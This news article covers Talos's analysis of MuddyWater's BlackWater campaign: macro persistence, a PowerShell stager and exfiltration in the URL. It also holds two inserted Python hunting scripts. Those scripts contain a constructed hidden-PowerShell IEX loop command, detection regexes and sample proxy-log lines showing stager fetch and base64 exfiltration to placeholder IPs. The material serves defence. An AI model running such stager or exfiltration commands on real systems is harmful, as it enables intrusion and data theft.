BlackWater Campaign Linked to MuddyWater Cyberspies

Tuesday, May 21, 2019

Ionut Arghire


A recently discovered campaign shows that the cyber-espionage group MuddyWater has updated tactics, techniques and procedures (TTPs) to evade detection, Talos’ security researchers report. 

MuddyWater was first detailed in 2017 and has been highly active throughout 2018. The cyber-spies have been focused mainly on governmental and telco targets in the Middle East (Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon) and nearby regions (Azerbaijan, Pakistan and Afghanistan).

The recently observed campaign, which Talos calls BlackWater, aims to install a PowerShell-based backdoor on the victim’s machine for remote access. Analyzed samples show that the actor’s changes were aimed at bypassing security controls; the underlying code was left unchanged. 

Observed modifications include the use of an obfuscated VBA script to establish persistence via a registry key and trigger a PowerShell stager. The stager connects to the attacker’s server to obtain a component of the open-source FruityC2 agent script, which is then used to enumerate the host machine. 

The gathered data is then sent to a different command and control (C&C) server, carried in the URL field, in another attempt to make host-based detection more difficult. Moreover, recent samples show that the actor renamed some variable strings, likely in an attempt to avoid signature-based detection. 

MuddyWater-associated samples observed in the February - March timeframe revealed that, after achieving persistence, the actor used PowerShell commands for reconnaissance. The samples also contained the IP address of the C&C server. 

These components were found in a Trojanized attachment sent to the victim, which allowed security researchers to easily analyze the attacks by obtaining a copy of the document. 

Activity observed in April, however, “would require a multi-step investigative approach,” Talos noted. A malicious document used last month and believed to be associated with MuddyWater contained a password-protected and obfuscated macro titled "BlackWater.bas". 

The macro contains a PowerShell script that persists through the "Run" registry key and calls the file “SysTextEnc.ini” every 300 seconds. The clear text version of the file, the security researchers say, appears to be a lightweight stager.
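The persistence described above (a Run-key value that launches PowerShell, which in turn re-reads a non-script file on a fixed interval) is something a defender can hunt for directly in registry-set telemetry. The following is an added example, not code from the article or from Talos, that scores Sysmon-style registry events for that pattern. The three sample events, including the command line that re-reads an .ini file every 300 seconds, are constructed for illustration and are not the macro's actual contents.

```python
import re

# Constructed Sysmon Event ID 13 (RegistryEvent: value set) records, trimmed to the
# fields the check needs. They are illustrative, not data from the Talos report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VPNClient",
     "Details": r'powershell.exe -NoProfile -File "C:\Program Files\VPN\startup.ps1"'},
    # Hypothetical rendering of the described behaviour: Office writes a Run value that
    # starts hidden PowerShell, which re-reads an .ini "stager" every 300 seconds.
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\SysTextEnc",
     "Details": r'powershell.exe -w hidden -ep bypass -c "while($true){IEX (Get-Content $env:TEMP\SysTextEnc.ini -Raw); Start-Sleep 300}"'},
]

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
# Office binaries should never be the process that writes a Run value.
OFFICE_PARENT = re.compile(r"\\(WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$", re.I)

# Each indicator is one cheap, independently explainable signal on the command line.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    # Code pulled from a file whose extension is not a script type (.ini, .txt, ...).
    "non_script_source": re.compile(
        r"(IEX|Invoke-Expression|Get-Content|\bgc\b).*\.(ini|txt|dat|log|tmp)\b", re.I | re.S),
    # Infinite loop with a sleep: a beacon/poll cadence rather than a one-shot task.
    "beacon_loop": re.compile(
        r"while\s*\(\s*\$true\s*\).*Start-Sleep\s+(-s(econds)?\s+)?\d+", re.I | re.S),
}


def hunt_run_keys(events, threshold=2):
    """Return Run-key entries that launch PowerShell and trip >= threshold indicators."""
    findings = []
    for ev in events:
        target, details = ev.get("TargetObject", ""), ev.get("Details", "")
        if not RUN_KEY.search(target) or not POWERSHELL.search(details):
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(details)]
        if OFFICE_PARENT.search(ev.get("Image", "")):
            hits.append("office_parent")
        if len(hits) >= threshold:
            findings.append({"value": target.rsplit("\\", 1)[-1],
                             "indicators": hits, "command": details})
    return findings


if __name__ == "__main__":
    for f in hunt_run_keys(SAMPLE_EVENTS):
        print(f"Run value '{f['value']}' flagged: {', '.join(f['indicators'])}")
        print("  ", f["command"])
```

A plain PowerShell-in-Run value (the VPN entry) scores zero and is not reported, which is the point of scoring rather than matching on "powershell" alone; the threshold is the knob to tune against your own fleet's baseline.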

The stager would connect to a C&C server at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text version of the crf.txt, Talos says, closely resembles a PowerShell agent previously used by the group. It only shows small changes, likely made to avoid detection. 

PowerShell commands derived from FruityC2 were then used to call Windows Management Instrumentation (WMI) and gather system information such as operating system name, OS architecture, operating system’s caption, domain and username, and the machine’s public IP address. 

The only command that did not call WMI would attempt to obtain the security system’s MD5 hash, which was likely used to uniquely identify the machine in case multiple workstations were compromised within the same network. 
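The network side of the chain described from the stager onward (PowerShell fetching a text file from a bare-IP server, then sending the enumerated host data to a different server inside the URL) leaves a distinctive footprint in web-proxy logs. The following is an added example, not code from the article or from Talos, that correlates those two requests per client. The log lines, hosts (RFC 5737 documentation addresses) and the base64-encoded enumeration string are all constructed; the real C&C addresses and payload format are not reproduced here.

```python
import base64
import binascii
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlparse, unquote

# Constructed sample: what the described chain might look like in a proxy log.
# Fields: timestamp, client, method, url, user-agent (tab separated).
EXFIL_BLOB = base64.b64encode(b"Microsoft Windows 10 Pro|64-bit|CORP\\alice|203.0.113.5").decode()
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.316"
SAMPLE_PROXY_LOG = "\n".join([
    "2019-04-09T10:02:11Z\t10.1.4.23\tGET\thttp://www.example.com/news/index.html\tMozilla/5.0 (Windows NT 10.0) Chrome/73.0",
    f"2019-04-09T10:02:40Z\t10.1.4.23\tGET\thttp://192.0.2.10/crf.txt\t{PS_UA}",
    f"2019-04-09T10:02:44Z\t10.1.4.23\tGET\thttp://198.51.100.7/c/?id=7&d={EXFIL_BLOB}\t{PS_UA}",
    "2019-04-09T10:03:01Z\t10.1.4.51\tGET\thttp://203.0.113.9/api/status\tcurl/7.64.0",
    f"2019-04-09T10:05:00Z\t10.1.4.51\tGET\thttp://updates.example.net/manifest.txt\t{PS_UA}",
])

BARE_IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


@dataclass
class Request:
    ts: datetime
    client: str
    method: str
    url: str
    ua: str

    @property
    def host(self):
        return urlparse(self.url).hostname or ""

    @property
    def path(self):
        return urlparse(self.url).path

    @property
    def query(self):
        return urlparse(self.url).query


def parse_log(text):
    reqs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, ua = line.split("\t", 4)
        reqs.append(Request(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, method, url, ua))
    return reqs


def looks_like_base64(value, min_len=24):
    """True if value is plausibly a base64 payload: long, canonical alphabet, decodes."""
    if len(value) < min_len or len(value) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def is_stager_fetch(req):
    """PowerShell pulling a 'text' file straight from a bare IP: the crf.txt pattern."""
    return ("PowerShell" in req.ua and BARE_IPV4.match(req.host) is not None
            and req.path.lower().endswith((".txt", ".ini", ".log")))


def exfil_in_url(req):
    """Return the decoded payload if a query parameter carries base64 data to a bare IP."""
    if not BARE_IPV4.match(req.host):
        return None
    for part in req.query.split("&"):
        _, _, value = part.partition("=")
        value = unquote(value)  # handles %-encoded '+', '/' and '='; '+' itself is kept
        if looks_like_base64(value):
            return base64.b64decode(value).decode("utf-8", "replace")
    return None


def correlate(reqs, window=timedelta(minutes=10)):
    """Pair each stager fetch with a later data-in-URL request from the same client to a
    different bare-IP host inside the window; that split is the TTP described above."""
    findings = []
    by_client = defaultdict(list)
    for r in reqs:
        by_client[r.client].append(r)
    for client, recs in by_client.items():
        recs.sort(key=lambda r: r.ts)
        for stager in (r for r in recs if is_stager_fetch(r)):
            for later in recs:
                if later.ts < stager.ts or later.ts - stager.ts > window or later.host == stager.host:
                    continue
                payload = exfil_in_url(later)
                if payload:
                    findings.append({"client": client, "stager_host": stager.host,
                                     "exfil_host": later.host, "payload": payload})
    return findings


if __name__ == "__main__":
    for f in correlate(parse_log(SAMPLE_PROXY_LOG)):
        print(f"{f['client']}: stager from {f['stager_host']}, data sent to {f['exfil_host']}")
        print("   decoded:", f["payload"])
```

Neither half is conclusive on its own (a PowerShell GET of a .txt file is common in admin scripts, and base64 in a query string is everyday web traffic); the value is in requiring the same client to do both, to two different bare-IP hosts, within minutes. Agents that use base64url or XOR the data before encoding will need the decoder in `looks_like_base64` adjusted.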

“Despite last month's report on aspects of the MuddyWater campaign, the group is undeterred and continues to perform operations. Based on these observations, as well as MuddyWater's history of targeting Turkey-based entities, we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group,” Talos concludes. 

Related: Kaspersky Analyzes Hacking Group's Homegrown Attack Tools

Related: Highly Active MuddyWater Hackers Hit 30 Organizations in 2 Months

 
